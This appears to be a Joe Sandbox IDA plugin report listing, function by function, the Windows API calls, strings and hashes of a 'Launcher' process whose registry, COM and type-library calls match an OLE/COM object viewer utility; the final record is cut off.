                                                                                                                • Instruction ID: 769b498fb357c04bb315f8e57d3b1560d42994b3d9644eb9c6b598391bf04418
                                                                                                                • Opcode Fuzzy Hash: 49e235f0b7e683e05df4ee24290b94273c3bbb5ee1ba8131d8462d4cf86b2c99
                                                                                                                • Instruction Fuzzy Hash: B531E4B1E0010EAADF01EBE0CD92DFFBBBCEF24345F1044A5B51176192DA799A08DA61
                                                                                                                APIs
                                                                                                                • RegOpenKeyW.ADVAPI32(80000000,TypeLib,00000000), ref: 00B67402
                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000040), ref: 00B6743B
                                                                                                                • RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 00B6745D
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00B67496
                                                                                                                • RegQueryValueW.ADVAPI32(?,?,?,00000208), ref: 00B674C9
                                                                                                                • CLSIDFromString.OLE32(00000000,-00000008), ref: 00B67570
                                                                                                                • wcstol.MSVCRT ref: 00B67610
                                                                                                                • wcsrchr.MSVCRT ref: 00B6762C
                                                                                                                • wcstol.MSVCRT ref: 00B67650
                                                                                                                • wsprintfW.USER32 ref: 00B67696
                                                                                                                • wsprintfW.USER32 ref: 00B676B9
                                                                                                                  • Part of subcall function 00B67F0B: SendMessageW.USER32(?,00001132,00000000,00B64852), ref: 00B67F1D
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B67743
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00B67754
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseEnumOpenwcstolwsprintf$FromMessageQuerySendStringValuewcsrchr
                                                                                                                • String ID: %s (Ver %s)$%s <no name>$'$TypeLib
                                                                                                                • API String ID: 3817488620-1332438793
                                                                                                                • Opcode ID: 0e266137afc3f381b26e65d4fa6bf587f24394c83164d0973e15b5df8ec30c67
                                                                                                                • Instruction ID: cbe2a2f9740a15d9a3f9dd2dfebf2cc9d9d006571751dcb9341af98f71ef764e
                                                                                                                • Opcode Fuzzy Hash: 0e266137afc3f381b26e65d4fa6bf587f24394c83164d0973e15b5df8ec30c67
                                                                                                                • Instruction Fuzzy Hash: 54A1D571D482289FDB61DB64CC89BA9B7F8FB08305F1040EAE50DA6250DB78AEC4DF41
                                                                                                                APIs
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 00B6D152
                                                                                                                • lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00B6D163
                                                                                                                • wsprintfW.USER32 ref: 00B6D179
                                                                                                                • RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00B6D1AA
                                                                                                                • wsprintfW.USER32 ref: 00B6D1CD
                                                                                                                  • Part of subcall function 00B6D6F5: RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,?,?,00B6D6E4,80000000,?,?,?,?,?), ref: 00B6D70D
                                                                                                                  • Part of subcall function 00B6D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,00B6D6E4,?,?,?,00B6D6E4,80000000,?,?,?,?,?), ref: 00B6D72C
                                                                                                                  • Part of subcall function 00B6D6F5: RegCloseKey.ADVAPI32(?,?,?,?,00B6D6E4,80000000,?,?,?,?,?,?,?,?), ref: 00B6D738
                                                                                                                • _wcsicmp.MSVCRT ref: 00B6D20E
                                                                                                                • wsprintfW.USER32 ref: 00B6D22D
                                                                                                                  • Part of subcall function 00B6D81B: lstrlenW.KERNEL32(00B6D19D,?,80000000,00000000), ref: 00B6D846
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 00B6D25C
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6D270
                                                                                                                • wsprintfW.USER32 ref: 00B6D286
                                                                                                                • lstrcpyW.KERNEL32(00000000,?), ref: 00B6D2C0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wsprintf$CloseOpenlstrcpy$EnumFromQueryStringValue_wcsicmplstrlen
                                                                                                                • String ID: AppID$AppID\%s$CLSID$CLSID\%s$CLSID\%s\LocalServer32$LocalServer32
                                                                                                                • API String ID: 566217164-1287389397
                                                                                                                • Opcode ID: be15c2ca0ee013c0bc7fc857b0a328725e00c6a925af4a60b317cd0cecb57db6
                                                                                                                • Instruction ID: 8cb3118b481bf6df37c428c7dc1f1ce7f4d7ea79ff4bd5b72adff5a8b1a258ef
                                                                                                                • Opcode Fuzzy Hash: be15c2ca0ee013c0bc7fc857b0a328725e00c6a925af4a60b317cd0cecb57db6
                                                                                                                • Instruction Fuzzy Hash: 5A513E72A00219AEEF21DB94DD45EEA77FDEF46301F4040E2B949E7041DBB49B498F91
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4078
                                                                                                                • String ID: "
                                                                                                                • API String ID: 2741252101-123907689
                                                                                                                • Opcode ID: 51df86a5c8db77d707c161882bd9df1965674251c1316448faba18ec6400a50e
                                                                                                                • Instruction ID: 3f14d4ae989462f4eab39db5c539856539a2f074d8d26b128eae356d97579771
                                                                                                                • Opcode Fuzzy Hash: 51df86a5c8db77d707c161882bd9df1965674251c1316448faba18ec6400a50e
                                                                                                                • Instruction Fuzzy Hash: 3CA13874904608DFDB24DFA4D899BADBBF1FF08706F1040A9E507A72A0DBB88994DF11
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B5B73B
                                                                                                                • #538.MFC42U(?), ref: 00B5B775
                                                                                                                  • Part of subcall function 00B64899: #1662.MFC42U ref: 00B648D9
                                                                                                                  • Part of subcall function 00B64899: #540.MFC42U ref: 00B648F3
                                                                                                                  • Part of subcall function 00B64899: lstrcpyW.KERNEL32(?,00000000), ref: 00B64912
                                                                                                                  • Part of subcall function 00B64899: CreateBindCtx.OLE32(00000000,?), ref: 00B64936
                                                                                                                  • Part of subcall function 00B64899: MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00B64971
                                                                                                                  • Part of subcall function 00B64899: #2644.MFC42U ref: 00B649D1
                                                                                                                  • Part of subcall function 00B64899: #2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 00B649E9
                                                                                                                  • Part of subcall function 00B64899: #800.MFC42U(?,00000000), ref: 00B64A19
                                                                                                                • #800.MFC42U(?,?,?), ref: 00B5B799
                                                                                                                • #538.MFC42U(?,?,?,?), ref: 00B5B7A9
                                                                                                                • #800.MFC42U(?,?,?), ref: 00B5B7D1
                                                                                                                • CLSIDFromProgID.OLE32(?,?,?,?,?), ref: 00B5B7F1
                                                                                                                • CoCreateInstance.OLE32(?,00000000,?), ref: 00B5B824
                                                                                                                • #538.MFC42U(?), ref: 00B5B836
                                                                                                                • #540.MFC42U ref: 00B5B84A
                                                                                                                • #2810.MFC42U(?,CoCreateInstance failed using the CLSID for '%s',?), ref: 00B5B862
                                                                                                                  • Part of subcall function 00B6D91D: __EH_prolog3.LIBCMT ref: 00B6D924
                                                                                                                  • Part of subcall function 00B6D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00B6B9B7,?,00000000,00000000,00000000), ref: 00B6D942
                                                                                                                  • Part of subcall function 00B6D91D: #540.MFC42U ref: 00B6D94F
                                                                                                                  • Part of subcall function 00B6D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00B6D96C
                                                                                                                  • Part of subcall function 00B6D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 00B6D97F
                                                                                                                  • Part of subcall function 00B6D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00B6D98C
                                                                                                                  • Part of subcall function 00B6D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00B6D997
                                                                                                                  • Part of subcall function 00B6D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00B6D99F
                                                                                                                  • Part of subcall function 00B6D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00B6D9AA
                                                                                                                  • Part of subcall function 00B6D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00B6DA13
                                                                                                                • #800.MFC42U(?,8007000E), ref: 00B5B8F8
                                                                                                                Strings
                                                                                                                • The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file., xrefs: 00B5B8DD
                                                                                                                • CoCreateInstance failed using the CLSID for '%s', xrefs: 00B5B85C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#2810#538#540$Create$#1197#1662#2644#858#922BindDisplayFormatFreeFromH_prolog3H_prolog3_InstanceLocalMessageNameParseProglstrcpy
                                                                                                                • String ID: CoCreateInstance failed using the CLSID for '%s'$The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file.
                                                                                                                • API String ID: 2990471804-1967779486
                                                                                                                • Opcode ID: d9d080151eb649b9aebd230e02a5d168b69d32717148d743340fbd844be9e743
                                                                                                                • Instruction ID: a72752a3bfd0828fd53e8d6032da63db921cb983b0762cd105383d7234d34b2a
                                                                                                                • Opcode Fuzzy Hash: d9d080151eb649b9aebd230e02a5d168b69d32717148d743340fbd844be9e743
                                                                                                                • Instruction Fuzzy Hash: 4C511971E00218DBCF00EFA4D995EDDBBF8AF48311B1441E5E915B72A1DB35AE09CB60
                                                                                                                APIs
                                                                                                                • #355.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,F6B930CF), ref: 00B625C2
                                                                                                                • #2507.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,F6B930CF), ref: 00B625D1
                                                                                                                • #800.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,F6B930CF), ref: 00B625E5
                                                                                                                • #3494.MFC42U(?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,F6B930CF), ref: 00B6260E
                                                                                                                • #800.MFC42U(?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,F6B930CF), ref: 00B62679
                                                                                                                • #3494.MFC42U(?,?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,F6B930CF), ref: 00B62696
                                                                                                                • #800.MFC42U(00000000,?,?,?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,F6B930CF), ref: 00B626D2
                                                                                                                • #800.MFC42U(?,00000000,AllFiles(*.*)|*.*|,?,F6B930CF), ref: 00B62796
                                                                                                                Strings
                                                                                                                • *.*, xrefs: 00B625B5
                                                                                                                • AllFiles(*.*)|*.*|, xrefs: 00B625A9
                                                                                                                • IMoniker::BindToObject failed on the file moniker created from ( "%s" )., xrefs: 00B62748
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#3494$#2507#355
                                                                                                                • String ID: *.*$AllFiles(*.*)|*.*|$IMoniker::BindToObject failed on the file moniker created from ( "%s" ).
                                                                                                                • API String ID: 539546934-1039925223
                                                                                                                • Opcode ID: 24b109bc417dbd983326bbaaa2b5ba315ba101cb5346792cc194e262ba44d6f8
                                                                                                                • Instruction ID: 50974715a2c637fd53c941d82ad6cda2b425b399df537d807c4a3654f94d06ad
                                                                                                                • Opcode Fuzzy Hash: 24b109bc417dbd983326bbaaa2b5ba315ba101cb5346792cc194e262ba44d6f8
                                                                                                                • Instruction Fuzzy Hash: 9A512470D146A8AFDB26DB64CC85BECB7F8BB14301F0480E9A419A32A1DB755F88CF01
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B6110A
                                                                                                                • SetActiveWindow.USER32(?,00000228), ref: 00B6111B
                                                                                                                • #2859.MFC42U(00000000), ref: 00B61122
                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B6112E
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B61152
                                                                                                                • #1165.MFC42U ref: 00B61158
                                                                                                                • #538.MFC42U(?), ref: 00B61187
                                                                                                                  • Part of subcall function 00B64899: #1662.MFC42U ref: 00B648D9
                                                                                                                  • Part of subcall function 00B64899: #540.MFC42U ref: 00B648F3
                                                                                                                  • Part of subcall function 00B64899: lstrcpyW.KERNEL32(?,00000000), ref: 00B64912
                                                                                                                  • Part of subcall function 00B64899: CreateBindCtx.OLE32(00000000,?), ref: 00B64936
                                                                                                                  • Part of subcall function 00B64899: MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00B64971
                                                                                                                  • Part of subcall function 00B64899: #2644.MFC42U ref: 00B649D1
                                                                                                                  • Part of subcall function 00B64899: #2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 00B649E9
                                                                                                                  • Part of subcall function 00B64899: #800.MFC42U(?,00000000), ref: 00B64A19
                                                                                                                • #800.MFC42U(?,00000000,?), ref: 00B611B5
                                                                                                                • #538.MFC42U(?,?,00000000,?), ref: 00B611CB
                                                                                                                  • Part of subcall function 00B642EB: #1662.MFC42U(F6B930CF), ref: 00B64326
                                                                                                                • #800.MFC42U(00000000,?,?,?,00000000,?), ref: 00B611F9
                                                                                                                • LoadTypeLib.OLEAUT32(?,00000000), ref: 00B6121B
                                                                                                                • #540.MFC42U ref: 00B61258
                                                                                                                • #2810.MFC42U(?,The file droped (%s) is not a valid persistent OLE object or Type Library file.,?), ref: 00B61277
                                                                                                                  • Part of subcall function 00B6D91D: __EH_prolog3.LIBCMT ref: 00B6D924
                                                                                                                  • Part of subcall function 00B6D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00B6B9B7,?,00000000,00000000,00000000), ref: 00B6D942
                                                                                                                  • Part of subcall function 00B6D91D: #540.MFC42U ref: 00B6D94F
                                                                                                                  • Part of subcall function 00B6D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00B6D96C
                                                                                                                  • Part of subcall function 00B6D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 00B6D97F
                                                                                                                  • Part of subcall function 00B6D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00B6D98C
                                                                                                                  • Part of subcall function 00B6D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00B6D997
                                                                                                                  • Part of subcall function 00B6D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00B6D99F
                                                                                                                  • Part of subcall function 00B6D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00B6D9AA
                                                                                                                  • Part of subcall function 00B6D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00B6DA13
                                                                                                                • #800.MFC42U(?,00000000), ref: 00B61296
                                                                                                                • DragFinish.SHELL32(?), ref: 00B612AF
                                                                                                                Strings
                                                                                                                • The file droped (%s) is not a valid persistent OLE object or Type Library file., xrefs: 00B61271
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#2810#540Drag$#1662#538FileQuery$#1165#1197#2644#2859#858#922ActiveBindCreateDisplayFinishFormatFreeH_prolog3H_prolog3_LoadLocalMessageNameParseTypeWindowlstrcpy
                                                                                                                • String ID: The file droped (%s) is not a valid persistent OLE object or Type Library file.
                                                                                                                • API String ID: 1998644663-3375467908
                                                                                                                • Opcode ID: 8de8a6ec9ca40168657361cba186669e19089e94b3a007932c19fc334fbdd035
                                                                                                                • Instruction ID: e596592d17de43733f10ed728bc3bade1930925d145fdb43113629157e4d2a6f
                                                                                                                • Opcode Fuzzy Hash: 8de8a6ec9ca40168657361cba186669e19089e94b3a007932c19fc334fbdd035
                                                                                                                • Instruction Fuzzy Hash: CC413F7290112DABCF14EBA0DC99BDDB7B8AF18311F1042D5E519A7191DB34AF85CF50
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B60F1A
                                                                                                                • #355.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00B60F3C
                                                                                                                • #2507.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00B60F4A
                                                                                                                • #3494.MFC42U(?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00B60F6B
                                                                                                                • LoadTypeLib.OLEAUT32(?,?), ref: 00B60F89
                                                                                                                • #540.MFC42U(?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00B60FA2
                                                                                                                • #3494.MFC42U(?,?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00B60FB8
                                                                                                                • #2810.MFC42U(?,LoadTypeLib( %s ) failed.,00000000,?,?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00B60FCF
                                                                                                                • #800.MFC42U ref: 00B60FE1
                                                                                                                • #800.MFC42U(?,8007000E), ref: 00B60FF9
                                                                                                                • #800.MFC42U(?,00000354), ref: 00B61034
                                                                                                                • #800.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00B6103F
                                                                                                                • #641.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00B6104A
                                                                                                                Strings
                                                                                                                • *.tlb, xrefs: 00B60F35
                                                                                                                • TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|, xrefs: 00B60F22
                                                                                                                • LoadTypeLib( %s ) failed., xrefs: 00B60FC9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#3494$#2507#2810#355#540#641H_prolog3_LoadType
                                                                                                                • String ID: *.tlb$LoadTypeLib( %s ) failed.$TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|
                                                                                                                • API String ID: 2313197997-4003309560
                                                                                                                • Opcode ID: b229114464099f0f2c87423878fd249c8718a46f3f53f8b569b3ae9edbd2e4f1
                                                                                                                • Instruction ID: 2d0c72ed0c728d95114deb5a32c3d80811d463525f379e279e264ca0a27322ca
                                                                                                                • Opcode Fuzzy Hash: b229114464099f0f2c87423878fd249c8718a46f3f53f8b569b3ae9edbd2e4f1
                                                                                                                • Instruction Fuzzy Hash: DE317C319006A89BCF26EB50CC82AEDB7BCAF15706F0840E9B409671A1DB795F88CF11
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B60826
                                                                                                                • #4219.MFC42U(Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo,Launch Permissions,00000004), ref: 00B6083E
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00B60853
                                                                                                                • SetCursor.USER32(00000000), ref: 00B6085A
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00B6088A
                                                                                                                • #2634.MFC42U(00000000), ref: 00B60897
                                                                                                                • #2634.MFC42U(00000000,00000000), ref: 00B608A3
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00B608AE
                                                                                                                • SetCursor.USER32(00000000), ref: 00B608B5
                                                                                                                • #4118.MFC42U ref: 00B608C3
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B608DB
                                                                                                                • #5977.MFC42U ref: 00B608E4
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B608F2
                                                                                                                Strings
                                                                                                                • LaunchPermission, xrefs: 00B60860
                                                                                                                • Launch Permissions, xrefs: 00B60832
                                                                                                                • Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo, xrefs: 00B60837
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CursorMessageSend$#2634Load$#4118#4219#5977
                                                                                                                • String ID: Launch Permissions$LaunchPermission$Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo
                                                                                                                • API String ID: 791338786-3477396783
                                                                                                                • Opcode ID: 2e73869a8da387865e0cdc4b5ce9a6949ea292fb7a3569020eaf5a2f235489b5
                                                                                                                • Instruction ID: 562f229020e4b20a7bdde2ae5aa38dbd1ee297cc206e21f7687dd619693d05c2
                                                                                                                • Opcode Fuzzy Hash: 2e73869a8da387865e0cdc4b5ce9a6949ea292fb7a3569020eaf5a2f235489b5
                                                                                                                • Instruction Fuzzy Hash: F9218431641210BAEB256F71DC4EFD73BA9DF47752F0100B0FE1DAA0A6CFA44885D6A0
                                                                                                                APIs
                                                                                                                • #5031.MFC42U(?,?,?), ref: 00B5D301
                                                                                                                • #6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 00B5D34C
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00B5D320
                                                                                                                  • Part of subcall function 00B5C8A6: ScreenToClient.USER32(?,?), ref: 00B5C8B7
                                                                                                                  • Part of subcall function 00B5C8A6: ScreenToClient.USER32(?,?), ref: 00B5C8C4
                                                                                                                  • Part of subcall function 00B5C8A6: #3133.MFC42U(?,?,?,00B5C46E,?), ref: 00B5C8CC
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00B5D36B
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5D38B
                                                                                                                • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00B5D3BC
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00B5D3E6
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5D406
                                                                                                                • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00B5D430
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00B5D44F
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5D46F
                                                                                                                • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00B5D499
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00B5D4B8
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5D4D8
                                                                                                                • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00B5D502
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00B5D521
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5D541
                                                                                                                • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00B5D568
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6193RectWindow$MessageSend$ClientScreen$#3133#5031
                                                                                                                • String ID:
                                                                                                                • API String ID: 4086507556-0
                                                                                                                • Opcode ID: 456a4efca38090d584c6283b98604b67468c770061978aed07da23d990f03700
                                                                                                                • Instruction ID: 986a633ec8c41475f2137f3b9a7077cc0cec2d5393b2ad5aabdef931730c2f1d
